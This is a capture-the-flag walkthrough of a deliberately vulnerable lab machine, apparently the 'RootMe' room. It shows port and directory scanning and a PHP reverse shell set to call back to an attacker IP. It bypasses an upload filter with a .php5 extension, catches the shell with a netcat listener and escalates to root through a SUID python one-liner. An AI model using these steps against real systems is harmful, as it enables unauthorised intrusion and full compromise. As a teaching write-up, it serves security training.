Task 1. Start the machine
Task 2. Reconnaissance
Scan the machine, how many ports are open?
Scan the target
#nmap -A -p- 10.x.x.x
Found 2 ports open 22,80
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
What version of Apache is running?
From the nmap scan we can see that the Apache version is 2.4.29
What service is running on port 22?
From the scan output we can see that the service running on port 22 is SSH
Find directories on the web server using the GoBuster tool.
# gobuster -h
dir Uses directory/file enumeration mode
dns Uses DNS subdomain enumeration mode
fuzz Uses fuzzing mode
help Help about any command
s3 Uses aws bucket enumeration mode
version shows the current version
vhost Uses VHOST enumeration mode
–delay duration Time each thread waits between requests (e.g. 1500ms)
-h, –help help for gobuster
–no-error Don’t display errors
-z, –no-progress Don’t display progress
-o, –output string Output file to write results to (defaults to stdout)
-p, –pattern string File containing replacement patterns
-q, –quiet Don’t print the banner and other noise
-t, –threads int Number of concurrent threads (default 10)
-v, –verbose Verbose output (errors)
-w, –wordlist string Path to the wordlist
We will use the following switches.
-w : path to wordlist
-u : url
dir : directory bruteforce
# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.47.229 >2 /dev/null
Scan returned five directories
/uploads (Status: 301) [Size: 314] [–> http://10.10.47.229/uploads/]
/css (Status: 301) [Size: 310] [–> http://10.10.47.229/css/]
/js (Status: 301) [Size: 309] [–> http://10.10.47.229/js/]
/panel (Status: 301) [Size: 312] [–> http://10.10.47.229/panel/]
/server-status (Status: 403) [Size: 277]
Status code 301 : The HTTP response status code 301 Moved Permanently is used for permanent redirecting, meaning current links or records using the URL this response is received for should be updated.
Status code 403 : The HTTP 403 Forbidden client error status response code indicates that the server understood the request but refuses to authorize it.
This status is similar to 401, but in this case, re-authenticating will make no difference. The access is permanently forbidden and tied to the application logic, such as insufficient rights to a resource.
The >2 /dev/null at the end is used to redirect any errors that might occur during the scan
What is the hidden directory?
Task 3. Getting a Shell
Find a form to upload and get a reverse shell, and find the flag.
Search for “file upload bypass” and “PHP reverse shell”.
Before searching on google what the Hint mentions, I tried using the php-reverse shell from Laundanum collection that comes with Kali Linux. It can be found in the following path
We need to edit the php-reverse-shell.php file.
Change the parameter $ip to your local machine ip and $port to any port that you know will not be blocked on your local machine.
Save and exit the document.
$VERSION = “1.0”;
$ip = ‘10.10.139.4’; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = ‘uname -a; w; id; /bin/sh -i’;
$daemon = 0;
$debug = 0;
Upload the file
Unfortunately you are not allowed to upload php files on the website, so we are back to google. Turns out we can trick the upload mechanism by renaming our file from .php to .php5
After rename we can successfully upload the file.
Getting the shell
Next we need to start netcat in order to get the reverse shell. We will use the following command and switches.
# nc -lvnp 1234
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-p local port number
Once we have nc setup it’s time to run the reverse shell script.
We have successfully uploaded the shell to the sever so in order to execute it we need to navigate to the folder containing the uploaded file.
Going back to Gobuster’s output we found a directory named /uploads. Navigate to that directory. Sure enough the file is there. Click on the file and let’s have a look on netcat.
# nc -vnlp 1234
listening on [any] 1234 …
connect to [10.9.4.125] from (UNKNOWN) [10.10.139.4] 46402
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:14:58 up 27 min, 0 users, load average: 0.07, 0.02, 0.06
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
We are in, now all that’s left is to locate the flag. The file containing it is called user.txt
A simple find command gives us the location.
$ find / -type f -name user.txt 2> /dev/null
$ cat /var/www/user.txt
Laudanum is a collection of injectable files, designed to be used in a pentest when upload vulnerabilities, administrative interfaces, and SQL injection flaws are found. These files are written in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.
Task 4. Privilege Escalation
Now that we have a shell, let’s escalate our privileges to root.
Search for files with SUID permission, which file is weird?
SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner.
If you create a script (owned by the root user) that needs the SUID bit set, you’d do so like:
$sudo chmod u+s filename
To search for the files with SUID permission we can use the following command.
# find / -type f -user root -perm -4000 2>/dev/null
–perm search for files with the specified permissions
-type f search for files only (not directories)
2> /dev/null suppress errors
-user search for files owned by the specified user
From the output we find an interesting file at /usr/bin/python
Find a form to escalate your privileges.
Search for gtfobins
Navigate to the SUID section, omit the first command.
$ /usr/bin/python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’
After that, we are logged in as root, now let’s get the root.txt flag
# find -type f -name root.txt 2> /dev/null
# cat /root/root.txt